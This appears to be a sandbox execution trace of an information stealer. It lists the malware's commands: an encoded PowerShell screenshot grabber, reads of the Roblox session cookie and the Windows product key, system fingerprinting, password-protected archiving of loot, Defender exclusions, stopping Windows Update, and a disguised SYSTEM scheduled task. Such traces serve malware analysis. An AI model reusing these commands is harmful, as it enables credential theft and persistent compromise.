JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                          8⤵
                                                                                                                            PID:6068
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                              9⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4836
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5nk1xwvc\5nk1xwvc.cmdline"
                                                                                                                                10⤵
                                                                                                                                  PID:4288
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA410.tmp" "c:\Users\Admin\AppData\Local\Temp\5nk1xwvc\CSCA4CCE7A2890C40C899ECD91A521939BF.TMP"
                                                                                                                                    11⤵
                                                                                                                                      PID:2916
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                8⤵
                                                                                                                                  PID:6048
                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                    tree /A /F
                                                                                                                                    9⤵
                                                                                                                                      PID:3700
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                    8⤵
                                                                                                                                      PID:4724
                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                        tree /A /F
                                                                                                                                        9⤵
                                                                                                                                          PID:2772
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                        8⤵
                                                                                                                                          PID:4784
                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                            tree /A /F
                                                                                                                                            9⤵
                                                                                                                                              PID:5240
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                            8⤵
                                                                                                                                              PID:4896
                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                tree /A /F
                                                                                                                                                9⤵
                                                                                                                                                  PID:5764
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                8⤵
                                                                                                                                                  PID:3156
                                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                                    tree /A /F
                                                                                                                                                    9⤵
                                                                                                                                                      PID:3812
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:884
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                        9⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5248
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5060
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                          9⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3840
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:2196
                                                                                                                                                          • C:\Windows\system32\getmac.exe
                                                                                                                                                            getmac
                                                                                                                                                            9⤵
                                                                                                                                                              PID:2288
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\V4gdU.zip" *"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:2800
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\V4gdU.zip" *
                                                                                                                                                                9⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1524
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4784
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic os get Caption
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5316
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3276
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic computersystem get totalphysicalmemory
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:6064
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:1212
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic csproduct get uuid
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5632
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:816
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:4080
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:2384
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic path win32_VideoController get name
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Detects videocard installed
                                                                                                                                                                              PID:1772
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:3568
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:1244
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:3512
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:4732
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1644
                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                          sc stop UsoSvc
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:3720
                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                          sc stop WaaSMedicSvc
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1436
                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                          sc stop wuauserv
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1584
                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                          sc stop bits
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:5192
                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                          sc stop dosvc
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:4028
                                                                                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2092
                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                          C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4340
                                                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                                                            C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:3528
                                                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                                                            C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2488
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:4712
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:6116
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop UsoSvc
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2772
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop WaaSMedicSvc
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:4724
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop wuauserv
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2224
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop bits
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2800
                                                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                                                  sc stop dosvc
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:2404
                                                                                                                                                                              • C:\Windows\System32\dialer.exe
                                                                                                                                                                                C:\Windows\System32\dialer.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4744
                                                                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4756
                                                                                                                                                                                • C:\Windows\System32\dialer.exe
                                                                                                                                                                                  C:\Windows\System32\dialer.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5824
                                                                                                                                                                                  • C:\Windows\System32\dialer.exe
                                                                                                                                                                                    C:\Windows\System32\dialer.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1372
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3440
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3484
                                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3892
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3956
                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4032
                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4092
                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4328
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4420
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5672
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5832
                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3176
